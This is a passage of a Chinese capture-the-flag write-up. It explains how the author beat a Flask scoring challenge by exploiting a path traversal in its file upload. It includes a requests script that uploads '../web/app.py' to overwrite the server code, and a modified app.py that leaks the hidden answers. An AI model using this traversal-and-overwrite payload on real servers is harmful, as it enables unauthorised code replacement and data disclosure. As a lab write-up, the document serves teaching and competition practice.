最终得到 flag{unoAAAA_esrever_now_U_run_MY_cAdeAcAAAAcbcf} … 吗？怎么这么多 A 呢？交上去 flag 也不对。

结合题目位置可知这绝对不是一道很简单的爬虫题，于是我把目光放到了源码中的 get_answer 函数：

1
2
3
4
5
6
7
8
9
10

def get_answer():
    # scoring with answer
    # I could change answers anytime so let's just load it every time
    with open("answers.json") as f:
        answers = json.load(f)
        # sanitize answer
        for idx, i in enumerate(answers):
            if i < 0:
                answers[idx] = 0
    return answers

原来 ASCII 码小于 65 的字符（数字）全都被变成了 0（65，即 A）…

在看源码后不难留意到上传文件的部分存在巨大的漏洞：

1
2
3
4

file = request.files['file']
filename = file.filename
filepath = os.path.join(UPLOAD_DIR, filename)
file.save(filepath)

它直接用了 os.path.join。结合给出的提示环境开了 --reload，如果我传一个文件名为 ../web/app.py 的文件，去掉这个归一化的逻辑，是不是就能得到真正的 flag 了呢？

1
2
3
4
5
6

payload = open("web.py").read()
response = requests.post("https://chal***.hack-challenge.lug.ustc.edu.cn:8443/submit", headers={
    "Content-Type": "multipart/form-data; boundary=---------------------------114514",
    },
data="-----------------------------114514\r\nContent-Disposition: form-data; name=\"file\"; filename=\"../web/app.py\"\r\nContent-Type: text/plain\r\n\r\n" + payload + "\n\r\n-----------------------------114514--\r\n"
)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68

from flask import Flask, render_template, request, flash, redirect
import json
import os
import traceback
import secrets

app = Flask(__name__)
app.secret_key = secrets.token_urlsafe(64)

UPLOAD_DIR = "/tmp/uploads"

os.makedirs(UPLOAD_DIR, exist_ok=True)

# results is a list
try:
    with open("results.json") as f:
        results = json.load(f)
except FileNotFoundError:
    results = []
    with open("results.json", "w") as f:
        json.dump(results, f)


def get_answer():
    # scoring with answer
    # I could change answers anytime so let's just load it every time
    with open("answers.json") as f:
        answers = json.load(f)
        # sanitize answer
    return answers


@app.route("/", methods=["GET"])
def index():
    return render_template("index.html", results=["GenshinImpact"])


@app.route("/submit", methods=["POST"])
def submit():
    if "file" not in request.files or request.files['file'].filename == "":
        flash("你忘了上传文件")
        return redirect("/")
    file = request.files['file']
    filename = file.filename
    filepath = os.path.join(UPLOAD_DIR, filename)
    file.save(filepath)

    answers = get_answer()
    try:
        with open(filepath) as f:
            user = json.load(f)
    except json.decoder.JSONDecodeError:
        flash("你提交的好像不是 JSON")
        return redirect("/")
    try:
        score = 0
        for idx, i in enumerate(answers):
            score += (i - user[idx]) * (i - user[idx])
    except:
        flash("分数计算出现错误")
        traceback.print_exc()
        return redirect("/")
    # ok, update results
    results.append(score)
    with open("results.json", "w") as f:
        json.dump(results, f)
    flash(f"原神启动成功，你的平方差为 {json.dumps(answers)}")
    return redirect("/")